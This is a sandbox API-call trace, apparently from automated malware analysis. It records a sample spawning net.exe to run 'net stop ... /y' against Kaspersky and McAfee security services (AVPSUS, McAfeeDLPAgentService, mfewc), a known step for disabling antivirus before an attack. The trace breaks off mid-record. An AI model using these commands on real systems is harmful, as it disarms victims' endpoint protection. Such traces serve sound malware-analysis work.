[0053.446] _wcsicmp (_String1="receiver", _String2="AVPSUS") returned 17 [0053.446] _wcsicmp (_String1="rcv", _String2="AVPSUS") returned 17 [0053.446] _wcsicmp (_String1="redirector", _String2="AVPSUS") returned 17 [0053.446] _wcsicmp (_String1="redir", _String2="AVPSUS") returned 17 [0053.446] _wcsicmp (_String1="rdr", _String2="AVPSUS") returned 17 [0053.446] _wcsicmp (_String1="workstation", _String2="AVPSUS") returned 22 [0053.446] _wcsicmp (_String1="work", _String2="AVPSUS") returned 22 [0053.446] _wcsicmp (_String1="wksta", _String2="AVPSUS") returned 22 [0053.446] _wcsicmp (_String1="prdr", _String2="AVPSUS") returned 15 [0053.446] _wcsicmp (_String1="devrdr", _String2="AVPSUS") returned 3 [0053.446] _wcsicmp (_String1="lanmanworkstation", _String2="AVPSUS") returned 11 [0053.446] _wcsicmp (_String1="server", _String2="AVPSUS") returned 18 [0053.446] _wcsicmp (_String1="svr", _String2="AVPSUS") returned 18 [0053.446] _wcsicmp (_String1="srv", _String2="AVPSUS") returned 18 [0053.446] _wcsicmp (_String1="lanmanserver", _String2="AVPSUS") returned 11 [0053.446] _wcsicmp (_String1="alerter", _String2="AVPSUS") returned -10 [0053.446] _wcsicmp (_String1="netlogon", _String2="AVPSUS") returned 13 [0053.446] _wcsicmp (_String1="AVPSUS", _String2="WORKSTATION") returned -22 [0053.446] _wcsicmp (_String1="AVPSUS", _String2="LanmanWorkstation") returned -11 [0053.446] _wcsicmp (_String1="AVPSUS", _String2="SERVER") returned -18 [0053.446] _wcsicmp (_String1="AVPSUS", _String2="LanmanServer") returned -11 [0053.446] _wcsicmp (_String1="AVPSUS", _String2="BROWSER") returned -1 [0053.446] _wcsicmp (_String1="AVPSUS", _String2="BROWSER") returned -1 [0053.446] _wcsicmp (_String1="AVPSUS", _String2="MESSENGER") returned -12 [0053.446] _wcsicmp (_String1="AVPSUS", _String2="MESSENGER") returned -12 [0053.446] _wcsicmp (_String1="AVPSUS", _String2="NETRUN") returned -13 [0053.446] _wcsicmp (_String1="AVPSUS", _String2="NETRUN") returned -13 [0053.446] _wcsicmp (_String1="AVPSUS", _String2="SPOOLER") returned -18 [0053.446] _wcsicmp (_String1="AVPSUS", _String2="SPOOLER") returned -18 [0053.446] _wcsicmp (_String1="AVPSUS", _String2="ALERTER") returned 10 [0053.446] _wcsicmp (_String1="AVPSUS", _String2="ALERTER") returned 10 [0053.446] _wcsicmp (_String1="AVPSUS", _String2="NETLOGON") returned -13 [0053.446] _wcsicmp (_String1="AVPSUS", _String2="NETLOGON") returned -13 [0053.446] _wcsicmp (_String1="AVPSUS", _String2="NETPOPUP") returned -13 [0053.446] _wcsicmp (_String1="AVPSUS", _String2="NETPOPUP") returned -13 [0053.446] _wcsicmp (_String1="AVPSUS", _String2="SQLSERVER") returned -18 [0053.446] _wcsicmp (_String1="AVPSUS", _String2="SQLSERVER") returned -18 [0053.446] _wcsicmp (_String1="AVPSUS", _String2="REPLICATOR") returned -17 [0053.446] _wcsicmp (_String1="AVPSUS", _String2="REPLICATOR") returned -17 [0053.447] _wcsicmp (_String1="AVPSUS", _String2="REMOTEBOOT") returned -17 [0053.447] _wcsicmp (_String1="AVPSUS", _String2="REMOTEBOOT") returned -17 [0053.447] _wcsicmp (_String1="AVPSUS", _String2="TIMESOURCE") returned -19 [0053.447] _wcsicmp (_String1="AVPSUS", _String2="TIMESOURCE") returned -19 [0053.447] _wcsicmp (_String1="AVPSUS", _String2="AFP") returned 16 [0053.447] _wcsicmp (_String1="AVPSUS", _String2="AFP") returned 16 [0053.447] _wcsicmp (_String1="AVPSUS", _String2="UPS") returned -20 [0053.447] _wcsicmp (_String1="AVPSUS", _String2="UPS") returned -20 [0053.447] _wcsicmp (_String1="AVPSUS", _String2="XACTSRV") returned -23 [0053.447] _wcsicmp (_String1="AVPSUS", _String2="XACTSRV") returned -23 [0053.447] _wcsicmp (_String1="AVPSUS", _String2="TCPIP") returned -19 [0053.447] _wcsicmp (_String1="AVPSUS", _String2="TCPIP") returned -19 [0053.447] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x440900 [0053.448] OpenServiceW (hSCManager=0x440900, lpServiceName="AVPSUS", dwDesiredAccess=0x84) returned 0x0 [0053.448] GetLastError () returned 0x424 [0053.449] CloseServiceHandle (hSCObject=0x440900) returned 1 [0053.449] wcscpy_s (in: _Destination=0x1247610, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0053.449] LoadLibraryExW (lpLibFileName="NETMSG", hFile=0x0, dwFlags=0x20) returned 0x1a0002 [0053.455] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x1a0002, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x1247c20, nSize=0x800, Arguments=0x12473d0 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0053.476] GetFileType (hFile=0x90) returned 0x2 [0053.476] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x11f7fc | out: lpMode=0x11f7fc) returned 1 [0053.480] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0x1247c20*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x11f808, lpReserved=0x0 | out: lpBuffer=0x1247c20*, lpNumberOfCharsWritten=0x11f808*=0x1e) returned 1 [0053.480] GetFileType (hFile=0x90) returned 0x2 [0053.480] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x11f7fc | out: lpMode=0x11f7fc) returned 1 [0053.480] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0x12212e4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x11f808, lpReserved=0x0 | out: lpBuffer=0x12212e4*, lpNumberOfCharsWritten=0x11f808*=0x2) returned 1 [0053.481] _ultow (in: _Dest=0x889, _Radix=1177680 | out: _Dest=0x889) returned="2185" [0053.481] FormatMessageW (in: dwFlags=0x2800, lpSource=0x1a0002, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x1247c20, nSize=0x800, Arguments=0x12473d0 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0053.481] GetFileType (hFile=0x90) returned 0x2 [0053.481] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x11f820 | out: lpMode=0x11f820) returned 1 [0053.481] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0x1247c20*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x11f82c, lpReserved=0x0 | out: lpBuffer=0x1247c20*, lpNumberOfCharsWritten=0x11f82c*=0x34) returned 1 [0053.481] GetFileType (hFile=0x90) returned 0x2 [0053.482] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x11f820 | out: lpMode=0x11f820) returned 1 [0053.482] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0x12212e4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x11f82c, lpReserved=0x0 | out: lpBuffer=0x12212e4*, lpNumberOfCharsWritten=0x11f82c*=0x2) returned 1 [0053.482] NetApiBufferFree (Buffer=0x437bf8) returned 0x0 [0053.482] NetApiBufferFree (Buffer=0x437c10) returned 0x0 [0053.482] GetCommandLineW () returned="C:\\WINDOWS\\system32\\net1 stop avpsus /y" [0053.482] exit (_Code=2) Thread: id = 22 os_tid = 0xe74 Process: id = "9" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0xff4a000" os_pid = "0x58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xde0" cmd_line = "\"net.exe\" stop McAfeeDLPAgentService /y" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 23 os_tid = 0x60 Thread: id = 27 os_tid = 0xff0 Process: id = "10" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xaca9000" os_pid = "0xf28" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0x58" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 24 os_tid = 0xfb0 Thread: id = 25 os_tid = 0xfb4 Thread: id = 26 os_tid = 0x4a0 Process: id = "11" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x8725000" os_pid = "0x8f4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0x58" cmd_line = "C:\\WINDOWS\\system32\\net1 stop McAfeeDLPAgentService /y" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 28 os_tid = 0xc10 [0054.082] GetModuleHandleA (lpModuleName=0x0) returned 0x1220000 [0054.082] __set_app_type (_Type=0x1) [0054.082] __p__fmode () returned 0x76953c14 [0054.082] __p__commode () returned 0x769549ec [0054.082] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1226f20) returned 0x0 [0054.082] __getmainargs (in: _Argc=0x123f608, _Argv=0x123f60c, _Env=0x123f610, _DoWildCard=0, _StartInfo=0x123f61c | out: _Argc=0x123f608, _Argv=0x123f60c, _Env=0x123f610) returned 0 [0054.082] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0054.082] GetConsoleOutputCP () returned 0x1b5 [0054.087] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x1246fa0 | out: lpCPInfo=0x1246fa0) returned 1 [0054.087] SetThreadUILanguage (LangId=0x0) returned 0x710409 [0054.090] sprintf_s (in: _DstBuf=0x90f90c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0054.090] setlocale (category=0, locale=".437") returned="English_United States.437" [0054.092] GetStdHandle (nStdHandle=0xfffffff5) returned 0x344 [0054.092] GetStdHandle (nStdHandle=0xfffffff4) returned 0x90 [0054.092] GetCommandLineW () returned="C:\\WINDOWS\\system32\\net1 stop McAfeeDLPAgentService /y" [0054.092] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x90f6b4, nSize=0x104 | out: lpFilename="C:\\WINDOWS\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0054.092] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x7e) returned 0xb84450 [0054.092] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0054.092] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x90f6b0 | out: Buffer=0x90f6b0*=0xb87bf8) returned 0x0 [0054.092] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x90f6ac | out: Buffer=0x90f6ac*=0xb87c10) returned 0x0 [0054.092] __iob_func () returned 0x76952608 [0054.092] _fileno (_File=0x76952608) returned 0 [0054.092] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0054.092] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0054.092] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0054.092] _wcsicmp (_String1="config", _String2="stop") returned -16 [0054.092] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0054.092] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0054.093] _wcsicmp (_String1="file", _String2="stop") returned -13 [0054.093] _wcsicmp (_String1="files", _String2="stop") returned -13 [0054.093] _wcsicmp (_String1="group", _String2="stop") returned -12 [0054.093] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0054.093] _wcsicmp (_String1="help", _String2="stop") returned -11 [0054.093] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0054.093] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0054.093] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0054.093] _wcsicmp (_String1="session", _String2="stop") returned -15 [0054.093] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0054.093] _wcsicmp (_String1=0x1221ffc, _String2="stop") returned -15 [0054.093] _wcsicmp (_String1="share", _String2="stop") returned -12 [0054.093] _wcsicmp (_String1="start", _String2="stop") returned -14 [0054.093] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0054.093] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0054.093] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0054.093] _wcsicmp (_String1="accounts", _String2="McAfeeDLPAgentService") returned -12 [0054.093] _wcsicmp (_String1="computer", _String2="McAfeeDLPAgentService") returned -10 [0054.093] _wcsicmp (_String1="config", _String2="McAfeeDLPAgentService") returned -10 [0054.093] _wcsicmp (_String1="continue", _String2="McAfeeDLPAgentService") returned -10 [0054.093] _wcsicmp (_String1="cont", _String2="McAfeeDLPAgentService") returned -10 [0054.093] _wcsicmp (_String1="file", _String2="McAfeeDLPAgentService") returned -7 [0054.093] _wcsicmp (_String1="files", _String2="McAfeeDLPAgentService") returned -7 [0054.093] _wcsicmp (_String1="group", _String2="McAfeeDLPAgentService") returned -6 [0054.093] _wcsicmp (_String1="groups", _String2="McAfeeDLPAgentService") returned -6 [0054.093] _wcsicmp (_String1="help", _String2="McAfeeDLPAgentService") returned -5 [0054.093] _wcsicmp (_String1="helpmsg", _String2="McAfeeDLPAgentService") returned -5 [0054.093] _wcsicmp (_String1="localgroup", _String2="McAfeeDLPAgentService") returned -1 [0054.093] _wcsicmp (_String1="pause", _String2="McAfeeDLPAgentService") returned 3 [0054.093] _wcsicmp (_String1="session", _String2="McAfeeDLPAgentService") returned 6 [0054.093] _wcsicmp (_String1="sessions", _String2="McAfeeDLPAgentService") returned 6 [0054.093] _wcsicmp (_String1="sess", _String2="McAfeeDLPAgentService") returned 6 [0054.093] _wcsicmp (_String1="share", _String2="McAfeeDLPAgentService") returned 6 [0054.093] _wcsicmp (_String1="start", _String2="McAfeeDLPAgentService") returned 6 [0054.093] _wcsicmp (_String1="stats", _String2="McAfeeDLPAgentService") returned 6 [0054.093] _wcsicmp (_String1="statistics", _String2="McAfeeDLPAgentService") returned 6 [0054.093] _wcsicmp (_String1="stop", _String2="McAfeeDLPAgentService") returned 6 [0054.094] _wcsicmp (_String1="time", _String2="McAfeeDLPAgentService") returned 7 [0054.094] _wcsicmp (_String1="user", _String2="McAfeeDLPAgentService") returned 8 [0054.094] _wcsicmp (_String1="users", _String2="McAfeeDLPAgentService") returned 8 [0054.094] _wcsicmp (_String1="msg", _String2="McAfeeDLPAgentService") returned 16 [0054.094] _wcsicmp (_String1="messenger", _String2="McAfeeDLPAgentService") returned 2 [0054.094] _wcsicmp (_String1="receiver", _String2="McAfeeDLPAgentService") returned 5 [0054.094] _wcsicmp (_String1="rcv", _String2="McAfeeDLPAgentService") returned 5 [0054.094] _wcsicmp (_String1="netpopup", _String2="McAfeeDLPAgentService") returned 1 [0054.094] _wcsicmp (_String1="redirector", _String2="McAfeeDLPAgentService") returned 5 [0054.094] _wcsicmp (_String1="redir", _String2="McAfeeDLPAgentService") returned 5 [0054.094] _wcsicmp (_String1="rdr", _String2="McAfeeDLPAgentService") returned 5 [0054.094] _wcsicmp (_String1="workstation", _String2="McAfeeDLPAgentService") returned 10 [0054.094] _wcsicmp (_String1="work", _String2="McAfeeDLPAgentService") returned 10 [0054.094] _wcsicmp (_String1="wksta", _String2="McAfeeDLPAgentService") returned 10 [0054.094] _wcsicmp (_String1="prdr", _String2="McAfeeDLPAgentService") returned 3 [0054.094] _wcsicmp (_String1="devrdr", _String2="McAfeeDLPAgentService") returned -9 [0054.094] _wcsicmp (_String1="lanmanworkstation", _String2="McAfeeDLPAgentService") returned -1 [0054.094] _wcsicmp (_String1="server", _String2="McAfeeDLPAgentService") returned 6 [0054.094] _wcsicmp (_String1="svr", _String2="McAfeeDLPAgentService") returned 6 [0054.094] _wcsicmp (_String1="srv", _String2="McAfeeDLPAgentService") returned 6 [0054.094] _wcsicmp (_String1="lanmanserver", _String2="McAfeeDLPAgentService") returned -1 [0054.094] _wcsicmp (_String1="alerter", _String2="McAfeeDLPAgentService") returned -12 [0054.094] _wcsicmp (_String1="netlogon", _String2="McAfeeDLPAgentService") returned 1 [0054.094] _wcsupr (in: _String="McAfeeDLPAgentService" | out: _String="MCAFEEDLPAGENTSERVICE") returned="MCAFEEDLPAGENTSERVICE" [0054.094] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0xb90670 [0054.097] GetServiceKeyNameW (in: hSCManager=0xb90670, lpDisplayName="MCAFEEDLPAGENTSERVICE", lpServiceName=0x1248c28, lpcchBuffer=0x90f624 | out: lpServiceName="", lpcchBuffer=0x90f624) returned 0 [0054.098] _wcsicmp (_String1="msg", _String2="MCAFEEDLPAGENTSERVICE") returned 16 [0054.098] _wcsicmp (_String1="messenger", _String2="MCAFEEDLPAGENTSERVICE") returned 2 [0054.098] _wcsicmp (_String1="receiver", _String2="MCAFEEDLPAGENTSERVICE") returned 5 [0054.098] _wcsicmp (_String1="rcv", _String2="MCAFEEDLPAGENTSERVICE") returned 5 [0054.098] _wcsicmp (_String1="redirector", _String2="MCAFEEDLPAGENTSERVICE") returned 5 [0054.098] _wcsicmp (_String1="redir", _String2="MCAFEEDLPAGENTSERVICE") returned 5 [0054.098] _wcsicmp (_String1="rdr", _String2="MCAFEEDLPAGENTSERVICE") returned 5 [0054.098] _wcsicmp (_String1="workstation", _String2="MCAFEEDLPAGENTSERVICE") returned 10 [0054.098] _wcsicmp (_String1="work", _String2="MCAFEEDLPAGENTSERVICE") returned 10 [0054.098] _wcsicmp (_String1="wksta", _String2="MCAFEEDLPAGENTSERVICE") returned 10 [0054.098] _wcsicmp (_String1="prdr", _String2="MCAFEEDLPAGENTSERVICE") returned 3 [0054.098] _wcsicmp (_String1="devrdr", _String2="MCAFEEDLPAGENTSERVICE") returned -9 [0054.098] _wcsicmp (_String1="lanmanworkstation", _String2="MCAFEEDLPAGENTSERVICE") returned -1 [0054.098] _wcsicmp (_String1="server", _String2="MCAFEEDLPAGENTSERVICE") returned 6 [0054.098] _wcsicmp (_String1="svr", _String2="MCAFEEDLPAGENTSERVICE") returned 6 [0054.098] _wcsicmp (_String1="srv", _String2="MCAFEEDLPAGENTSERVICE") returned 6 [0054.098] _wcsicmp (_String1="lanmanserver", _String2="MCAFEEDLPAGENTSERVICE") returned -1 [0054.098] _wcsicmp (_String1="alerter", _String2="MCAFEEDLPAGENTSERVICE") returned -12 [0054.099] _wcsicmp (_String1="netlogon", _String2="MCAFEEDLPAGENTSERVICE") returned 1 [0054.099] _wcsicmp (_String1="MCAFEEDLPAGENTSERVICE", _String2="WORKSTATION") returned -10 [0054.099] _wcsicmp (_String1="MCAFEEDLPAGENTSERVICE", _String2="LanmanWorkstation") returned 1 [0054.099] _wcsicmp (_String1="MCAFEEDLPAGENTSERVICE", _String2="SERVER") returned -6 [0054.099] _wcsicmp (_String1="MCAFEEDLPAGENTSERVICE", _String2="LanmanServer") returned 1 [0054.099] _wcsicmp (_String1="MCAFEEDLPAGENTSERVICE", _String2="BROWSER") returned 11 [0054.099] _wcsicmp (_String1="MCAFEEDLPAGENTSERVICE", _String2="BROWSER") returned 11 [0054.099] _wcsicmp (_String1="MCAFEEDLPAGENTSERVICE", _String2="MESSENGER") returned -2 [0054.099] _wcsicmp (_String1="MCAFEEDLPAGENTSERVICE", _String2="MESSENGER") returned -2 [0054.099] _wcsicmp (_String1="MCAFEEDLPAGENTSERVICE", _String2="NETRUN") returned -1 [0054.099] _wcsicmp (_String1="MCAFEEDLPAGENTSERVICE", _String2="NETRUN") returned -1 [0054.099] _wcsicmp (_String1="MCAFEEDLPAGENTSERVICE", _String2="SPOOLER") returned -6 [0054.099] _wcsicmp (_String1="MCAFEEDLPAGENTSERVICE", _String2="SPOOLER") returned -6 [0054.099] _wcsicmp (_String1="MCAFEEDLPAGENTSERVICE", _String2="ALERTER") returned 12 [0054.099] _wcsicmp (_String1="MCAFEEDLPAGENTSERVICE", _String2="ALERTER") returned 12 [0054.099] _wcsicmp (_String1="MCAFEEDLPAGENTSERVICE", _String2="NETLOGON") returned -1 [0054.099] _wcsicmp (_String1="MCAFEEDLPAGENTSERVICE", _String2="NETLOGON") returned -1 [0054.099] _wcsicmp (_String1="MCAFEEDLPAGENTSERVICE", _String2="NETPOPUP") returned -1 [0054.099] _wcsicmp (_String1="MCAFEEDLPAGENTSERVICE", _String2="NETPOPUP") returned -1 [0054.099] _wcsicmp (_String1="MCAFEEDLPAGENTSERVICE", _String2="SQLSERVER") returned -6 [0054.099] _wcsicmp (_String1="MCAFEEDLPAGENTSERVICE", _String2="SQLSERVER") returned -6 [0054.099] _wcsicmp (_String1="MCAFEEDLPAGENTSERVICE", _String2="REPLICATOR") returned -5 [0054.099] _wcsicmp (_String1="MCAFEEDLPAGENTSERVICE", _String2="REPLICATOR") returned -5 [0054.099] _wcsicmp (_String1="MCAFEEDLPAGENTSERVICE", _String2="REMOTEBOOT") returned -5 [0054.099] _wcsicmp (_String1="MCAFEEDLPAGENTSERVICE", _String2="REMOTEBOOT") returned -5 [0054.099] _wcsicmp (_String1="MCAFEEDLPAGENTSERVICE", _String2="TIMESOURCE") returned -7 [0054.099] _wcsicmp (_String1="MCAFEEDLPAGENTSERVICE", _String2="TIMESOURCE") returned -7 [0054.099] _wcsicmp (_String1="MCAFEEDLPAGENTSERVICE", _String2="AFP") returned 12 [0054.099] _wcsicmp (_String1="MCAFEEDLPAGENTSERVICE", _String2="AFP") returned 12 [0054.099] _wcsicmp (_String1="MCAFEEDLPAGENTSERVICE", _String2="UPS") returned -8 [0054.099] _wcsicmp (_String1="MCAFEEDLPAGENTSERVICE", _String2="UPS") returned -8 [0054.099] _wcsicmp (_String1="MCAFEEDLPAGENTSERVICE", _String2="XACTSRV") returned -11 [0054.099] _wcsicmp (_String1="MCAFEEDLPAGENTSERVICE", _String2="XACTSRV") returned -11 [0054.099] _wcsicmp (_String1="MCAFEEDLPAGENTSERVICE", _String2="TCPIP") returned -7 [0054.099] _wcsicmp (_String1="MCAFEEDLPAGENTSERVICE", _String2="TCPIP") returned -7 [0054.099] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0xb90828 [0054.100] OpenServiceW (hSCManager=0xb90828, lpServiceName="MCAFEEDLPAGENTSERVICE", dwDesiredAccess=0x84) returned 0x0 [0054.100] GetLastError () returned 0x424 [0054.100] CloseServiceHandle (hSCObject=0xb90828) returned 1 [0054.100] wcscpy_s (in: _Destination=0x1247610, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0054.100] LoadLibraryExW (lpLibFileName="NETMSG", hFile=0x0, dwFlags=0x20) returned 0xa10002 [0054.101] FormatMessageW (in: dwFlags=0x2a00, lpSource=0xa10002, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x1247c20, nSize=0x800, Arguments=0x12473d0 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0054.102] GetFileType (hFile=0x90) returned 0x2 [0054.102] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x90f4b4 | out: lpMode=0x90f4b4) returned 1 [0054.106] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0x1247c20*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x90f4c0, lpReserved=0x0 | out: lpBuffer=0x1247c20*, lpNumberOfCharsWritten=0x90f4c0*=0x1e) returned 1 [0054.165] GetFileType (hFile=0x90) returned 0x2 [0054.165] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x90f4b4 | out: lpMode=0x90f4b4) returned 1 [0054.174] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0x12212e4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x90f4c0, lpReserved=0x0 | out: lpBuffer=0x12212e4*, lpNumberOfCharsWritten=0x90f4c0*=0x2) returned 1 [0054.178] _ultow (in: _Dest=0x889, _Radix=9499912 | out: _Dest=0x889) returned="2185" [0054.178] FormatMessageW (in: dwFlags=0x2800, lpSource=0xa10002, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x1247c20, nSize=0x800, Arguments=0x12473d0 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0054.178] GetFileType (hFile=0x90) returned 0x2 [0054.178] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x90f4d8 | out: lpMode=0x90f4d8) returned 1 [0054.180] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0x1247c20*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x90f4e4, lpReserved=0x0 | out: lpBuffer=0x1247c20*, lpNumberOfCharsWritten=0x90f4e4*=0x34) returned 1 [0054.181] GetFileType (hFile=0x90) returned 0x2 [0054.181] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x90f4d8 | out: lpMode=0x90f4d8) returned 1 [0054.182] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0x12212e4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x90f4e4, lpReserved=0x0 | out: lpBuffer=0x12212e4*, lpNumberOfCharsWritten=0x90f4e4*=0x2) returned 1 [0054.183] NetApiBufferFree (Buffer=0xb87bf8) returned 0x0 [0054.183] NetApiBufferFree (Buffer=0xb87c10) returned 0x0 [0054.183] GetCommandLineW () returned="C:\\WINDOWS\\system32\\net1 stop McAfeeDLPAgentService /y" [0054.183] exit (_Code=2) Thread: id = 29 os_tid = 0xf4c Process: id = "12" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5a14f000" os_pid = "0xd2c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xde0" cmd_line = "\"net.exe\" stop mfewc /y" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 30 os_tid = 0x89c Thread: id = 34 os_tid = 0xa90 Process: id = "13" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x8761000" os_pid = "0xfdc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "12" os_parent_pid = "0xd2c" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 31 os_tid = 0xfc8 Thread: id = 32 os_tid = 0xf90 Thread: id = 33 os_tid = 0xfac Process: id = "14" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = 